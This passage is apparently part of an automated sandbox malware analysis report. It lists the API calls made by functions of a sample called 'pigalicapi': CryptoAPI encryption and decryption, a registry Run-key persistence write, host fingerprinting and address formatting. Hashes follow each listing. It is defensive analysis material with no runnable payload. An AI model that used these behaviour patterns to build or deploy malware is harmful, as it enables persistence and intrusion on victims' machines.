                                                                                                                                                                                • API String ID: 647993726-1844329478
                                                                                                                                                                                • Opcode ID: f2fc44c97f70542398b4f9aa0f8975eab6e9b4c6415b00e3eccc01d05e167521
                                                                                                                                                                                • Instruction ID: 23fbec7d9dd36e5a1160570bc8fcb36ad7e716dba3447b5024366c9801aa6106
                                                                                                                                                                                • Opcode Fuzzy Hash: f2fc44c97f70542398b4f9aa0f8975eab6e9b4c6415b00e3eccc01d05e167521
                                                                                                                                                                                • Instruction Fuzzy Hash: B5318FB0A0024AABDF10CFD4C859BFFBBB8BB54704F14404EE545AB381D3B55A04DBA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 005D456C
                                                                                                                                                                                • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D458B
                                                                                                                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 005D45AD
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D45D6
                                                                                                                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 005D4617
                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 005D463E
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D482A
                                                                                                                                                                                  • Part of subcall function 005D47F0: GetLastError.KERNEL32 ref: 005D4834
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D4850
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 005D48EB
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptHashData.ADVAPI32(00000000,?,00000010,00000000), ref: 005D490B
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptDeriveKey.ADVAPI32(00000000,00006801,00000000,00000001,00000000), ref: 005D493C
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,?,000002F0), ref: 005D496F
                                                                                                                                                                                  • Part of subcall function 005D47F0: CryptDestroyKey.ADVAPI32(00000000), ref: 005D4982
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D468F
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 005D47C0
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 005D47E0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$File$Virtual$AcquireCloseContextCreateFreeHash$AllocChangeDataDecryptDeriveDestroyErrorFindHandleLastModuleNameNotificationReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2585753175-0
                                                                                                                                                                                • Opcode ID: e2bf51c64d5f933bab4b9f98983408781e7b5c7ea9ab2e2b3d9b1487f0c2b4c9
                                                                                                                                                                                • Instruction ID: 94d93e520419e0b5d4cd877452853a04200621428465f195ce6e67de82073714
                                                                                                                                                                                • Opcode Fuzzy Hash: e2bf51c64d5f933bab4b9f98983408781e7b5c7ea9ab2e2b3d9b1487f0c2b4c9
                                                                                                                                                                                • Instruction Fuzzy Hash: B4816B74A016289BCB34CB54DC95BAABBB4BF49306F0091DAE508AB3C1D7749F85CF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 005D9D9A
                                                                                                                                                                                • GetVolumeInformationA.KERNEL32(?,?,00000103,00000000,00000000,00000000,?,00000063), ref: 005D9DDD
                                                                                                                                                                                  • Part of subcall function 005D9F70: GetAdaptersInfo.IPHLPAPI(00000000,005D9E2D), ref: 005D9FEB
                                                                                                                                                                                • StringFromCLSID.OLE32(00000020,?), ref: 005D9EF7
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,0019660D,00000000,00000000,00000000), ref: 005D9F25
                                                                                                                                                                                • lstrcpynA.KERNEL32(0019660D,0019660C,?), ref: 005D9F46
                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 005D9F57
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AdaptersByteCharDirectoryFreeFromInfoInformationMultiStringSystemTaskVolumeWidelstrcpyn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2697952880-3916222277
                                                                                                                                                                                • Opcode ID: e1f1d1eec545bc6927700a9986a1347a44bea9fe2a05a783495dee235c584f23
                                                                                                                                                                                • Instruction ID: 8dda1206e22141d371f3f4863b771365c2016df57b10192911a6a3d3a74c0810
                                                                                                                                                                                • Opcode Fuzzy Hash: e1f1d1eec545bc6927700a9986a1347a44bea9fe2a05a783495dee235c584f23
                                                                                                                                                                                • Instruction Fuzzy Hash: 00512A759013199FDB35CF54CC88BEABBB9FB44304F1482DAE509A6280DB709B88CF51
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000005), ref: 005D13C6
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 005D13CD
                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005D149E
                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 005D14A5
                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005D14EA
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 005D14F1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Heap$Process$Free$Allocate
                                                                                                                                                                                • String ID: ====
                                                                                                                                                                                • API String ID: 168621272-1026985228
                                                                                                                                                                                • Opcode ID: d257d4c52224826e373173f653335da84bc172ad5a4406d02f8d4f29e94f6798
                                                                                                                                                                                • Instruction ID: 9b48865c584024f0a2cea381bd9761d0eea830320c62569076f16048595d7d0a
                                                                                                                                                                                • Opcode Fuzzy Hash: d257d4c52224826e373173f653335da84bc172ad5a4406d02f8d4f29e94f6798
                                                                                                                                                                                • Instruction Fuzzy Hash: CC414BB5D0060AEBCF20CFA8D849BAE7FB5BF44305F10861BE515A7391D7349A44CB95
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 005D79A3
                                                                                                                                                                                  • Part of subcall function 005DA400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 005DA45C
                                                                                                                                                                                  • Part of subcall function 005DA400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 005DA480
                                                                                                                                                                                  • Part of subcall function 005DA400: RegCloseKey.KERNEL32(00000000), ref: 005DA494
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D7AE3
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D8AD3
                                                                                                                                                                                  • Part of subcall function 005D8A70: GetLastError.KERNEL32 ref: 005D8ADD
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8B0C
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 005D8B37
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D8B5E
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 005D8B7A
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 005D8B87
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 005D8B91
                                                                                                                                                                                  • Part of subcall function 005D8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8B9D
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 005D7A4B
                                                                                                                                                                                • inet_ntoa.WS2_32(?), ref: 005D7A90
                                                                                                                                                                                • wnsprintfA.SHLWAPI ref: 005D7ABC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                • String ID: %s:%u$Wopkesjym
                                                                                                                                                                                • API String ID: 1891311255-3215833199
                                                                                                                                                                                • Opcode ID: 551f5a682dc7c9d9a9028548cb9a3d0e934e679316ddf0800ff74edc9dd4d3cc
                                                                                                                                                                                • Instruction ID: 2ba731316786eeb44f3f7ece64154c59addcb3ed77fbfdc9bb633f8ab909a8ed
                                                                                                                                                                                • Opcode Fuzzy Hash: 551f5a682dc7c9d9a9028548cb9a3d0e934e679316ddf0800ff74edc9dd4d3cc
                                                                                                                                                                                • Instruction Fuzzy Hash: 20414EB1E04209EBEB14DB98CC85BEEBBB5FB48705F14805AE6057B381E7749A44CB64
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0120C8C2,?,?,00000000), ref: 0120C6CB
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0120C703
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0120C8C2,?,?,00000000,?,?,?), ref: 0120C751
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0120C7E8
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,0120C8C2,?,?,00000000,?), ref: 0120C84B
                                                                                                                                                                                • __freea.LIBCMT ref: 0120C858
                                                                                                                                                                                  • Part of subcall function 0120C4E6: RtlAllocateHeap.NTDLL(00000000,?,?,?,0120C5D8,00000000), ref: 0120C518
                                                                                                                                                                                • __freea.LIBCMT ref: 0120C861
                                                                                                                                                                                • __freea.LIBCMT ref: 0120C886
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.677240199.0000000001201000.00000020.00000001.01000000.00000006.sdmp, Offset: 01200000, based on PE: true
                                                                                                                                                                                • Associated: 00000001.00000002.677203822.0000000001200000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677266145.0000000001216000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677329595.0000000001235000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677368260.0000000001240000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                • Associated: 00000001.00000002.677397952.0000000001242000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1200000_pigalicapi.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3864826663-0
                                                                                                                                                                                • Opcode ID: e10f6e4a4a61d50fc1f19498a9d1e85e697a6ef71f2d4802dac3766c011a289c
                                                                                                                                                                                • Instruction ID: 57558806041a43cfcc9838b4663c76c83914479da67110ae2953d4ebd47ab23a
                                                                                                                                                                                • Opcode Fuzzy Hash: e10f6e4a4a61d50fc1f19498a9d1e85e697a6ef71f2d4802dac3766c011a289c
                                                                                                                                                                                • Instruction Fuzzy Hash: 6151D8B2630207AFEB274E64CC45EBF7BAAEB40660F1543A9FE04D61C1DB74DD608694
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 005D4AD8
                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000064), ref: 005D4AF4
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(-0000000C), ref: 005D4B08
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(-0000000C), ref: 005D4B44
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D4B6B
                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 005D4B78
                                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 005D4B85
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 005D4B90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3462651527-0
                                                                                                                                                                                • Opcode ID: fe8aee838e651097db8eb0841713bb946aca1ef38823062007fc026d260601d9
                                                                                                                                                                                • Instruction ID: e84f50096f21401f8f0dad04eb1c0b44612ddc62fbff9f910317498d5312a733
                                                                                                                                                                                • Opcode Fuzzy Hash: fe8aee838e651097db8eb0841713bb946aca1ef38823062007fc026d260601d9
                                                                                                                                                                                • Instruction Fuzzy Hash: 10214A74901209EFDB20DBA8D948BAEBBB9FF58301F10858BE505A7381D735EA44DF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 005D77C2
                                                                                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 005D780E
                                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 005D7826
                                                                                                                                                                                • CloseHandle.KERNEL32(00001388), ref: 005D7835
                                                                                                                                                                                • Sleep.KERNEL32(00007530), ref: 005D7840
                                                                                                                                                                                • VirtualFree.KERNEL32(00000096,00000000,00008000), ref: 005D78A5
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 005D78BD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep$CloseCodeExitFreeHandleInitializeProcessUninitializeVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2326833528-0
                                                                                                                                                                                • Opcode ID: b494c7b6db7609a267831df084443b331f2b55bbaecef0302707d0f549b8ad20
                                                                                                                                                                                • Instruction ID: 15140fb88de3ba008dc482e1ede9f44343b26f81299b6eb47266d7c51cc275d7
                                                                                                                                                                                • Opcode Fuzzy Hash: b494c7b6db7609a267831df084443b331f2b55bbaecef0302707d0f549b8ad20
                                                                                                                                                                                • Instruction Fuzzy Hash: 77316F74904209EFDB20CF98D84DBAEBBB1FB48305F20855BE405A7380E7719E44EB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D5CEB
                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005D5D10
                                                                                                                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 005D5D29
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D5D45
                                                                                                                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 005D5D6D
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D5D99
                                                                                                                                                                                • FindCloseChangeNotification.KERNEL32(000000FF), ref: 005D5DA3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Virtual$AllocChangeCloseCreateFindFreeNotificationReadSizelstrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 443218420-0
                                                                                                                                                                                • Opcode ID: 46cd0b39777c0f1ed886d2bf1f8ab9770facb70947f11fab98bf656672f6fd93
                                                                                                                                                                                • Instruction ID: 0060d9cd5b3a497fbd454cc88ff945c3f814092c17f3c1a6b0e6b0959abdf3f2
                                                                                                                                                                                • Opcode Fuzzy Hash: 46cd0b39777c0f1ed886d2bf1f8ab9770facb70947f11fab98bf656672f6fd93
                                                                                                                                                                                • Instruction Fuzzy Hash: C5210A75A01209FFDB20EFE4CC49BAEBB75BB48701F10854AF615A72C0D7749A44CBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,00000000), ref: 005D1337
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 005D1345
                                                                                                                                                                                • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 005D1368
                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 005D1372
                                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 005D137D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                • String ID: software\microsoft\windows\currentversion\run
                                                                                                                                                                                • API String ID: 3411147897-1396020897
                                                                                                                                                                                • Opcode ID: df846bb80a3947992addee5f30dc1a81db1742efab911af290794dd63cef343b
                                                                                                                                                                                • Instruction ID: 38b8cb5fee9ba7c46684b4565b59f5d22d9b632acad6e46bb7c8e6b5a6c7a60c
                                                                                                                                                                                • Opcode Fuzzy Hash: df846bb80a3947992addee5f30dc1a81db1742efab911af290794dd63cef343b
                                                                                                                                                                                • Instruction Fuzzy Hash: 71214F70A01209EFDB24CFE9C948BAEBFB4BB14301F10465AE601A7380D7709E44DB91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D5B7F
                                                                                                                                                                                • lstrlenA.KERNEL32(00000000), ref: 005D5B8C
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,00000000), ref: 005D5BB6
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D5BF6
                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,00000000), ref: 005D5C2A
                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,00000000,-00000001), ref: 005D5C59
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D5C9E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocVirtuallstrlen$lstrcpyn
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 808621155-0
                                                                                                                                                                                • Opcode ID: 3306a6d2d9e39ee7aa8df06a2ed4954ce5d9714827822ee64cbe22b8c01ccf63
                                                                                                                                                                                • Instruction ID: 5c73d2f44f39ef9c999373e715bf1b5d31dc174c67922ddfea304eae8377d123
                                                                                                                                                                                • Opcode Fuzzy Hash: 3306a6d2d9e39ee7aa8df06a2ed4954ce5d9714827822ee64cbe22b8c01ccf63
                                                                                                                                                                                • Instruction Fuzzy Hash: BC510770901609EFDB14CF98C998BEEBBB5BF48305F14855BE505A7394D335AA40CFA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,005E3B88,00000000,000F003F,00000000), ref: 005D6D30
                                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,005E3FA6,00000000,00000003,?,00000020), ref: 005D6D61
                                                                                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,005E3FA6), ref: 005D6D7E
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 005D6D88
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 647993726-3916222277
                                                                                                                                                                                • Opcode ID: 32c2d514516c7e1b76eab0c8df538c2b4eaab7744a1677fd38f6c249c737d142
                                                                                                                                                                                • Instruction ID: 239f5b5f3c8b0d36ab094eab9d69dea168ff486142766b20b696140b85e15289
                                                                                                                                                                                • Opcode Fuzzy Hash: 32c2d514516c7e1b76eab0c8df538c2b4eaab7744a1677fd38f6c249c737d142
                                                                                                                                                                                • Instruction Fuzzy Hash: A2118F75E04249AFDB14DFE4D888BBEBFB8BB18304F00814AE541AB240D7B55609DBA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 005D83BF
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 005D83D6
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 005D846B
                                                                                                                                                                                  • Part of subcall function 005D8970: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 005D89BF
                                                                                                                                                                                  • Part of subcall function 005D8970: GetLastError.KERNEL32 ref: 005D89C9
                                                                                                                                                                                  • Part of subcall function 005D8970: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D89F8
                                                                                                                                                                                  • Part of subcall function 005D8970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D8A1F
                                                                                                                                                                                  • Part of subcall function 005D8970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 005D8A41
                                                                                                                                                                                  • Part of subcall function 005D8970: CryptDestroyKey.ADVAPI32(00000000), ref: 005D8A4E
                                                                                                                                                                                  • Part of subcall function 005D8970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 005D8A5A
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D858C
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D85A3
                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005D85BA
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,005D8420,00000000,00001000,00000000), ref: 005D883B
                                                                                                                                                                                  • Part of subcall function 005D8800: GetLastError.KERNEL32 ref: 005D8845
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptAcquireContextA.ADVAPI32(00000000,005DC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 005D8874
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 005D88AF
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 005D88CF
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 005D890C
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 005D892A
                                                                                                                                                                                  • Part of subcall function 005D8800: CryptDestroyKey.ADVAPI32(?), ref: 005D8937
                                                                                                                                                                                  • Part of subcall function 005D87D0: QueryPerformanceCounter.KERNEL32(?), ref: 005D87E7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000001.00000002.675808214.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_1_2_5d0000_pigalicapi.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 487564122-0
                                                                                                                                                                                • Opcode ID: f1f0d66dfa30041235d3d7a86e7ed8f2a121c4033f952a41fc4175f06f716d9a
                                                                                                                                                                                • Instruction ID: c18c2cfe1bc7edaff44c516411990a7691d6129eec34052127d5064200e2f002
                                                                                                                                                                                • Opcode Fuzzy Hash: f1f0d66dfa30041235d3d7a86e7ed8f2a121c4033f952a41fc4175f06f716d9a
                                                                                                                                                                                • Instruction Fuzzy Hash: 87711FB5D00209BBDB24DF98DC45FEEBBB5BB48300F14811AFA15A7381EB749A44CB65
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LCMapStringEx.KERNEL32 ref: 0120A9AF
                                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0120A9CD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
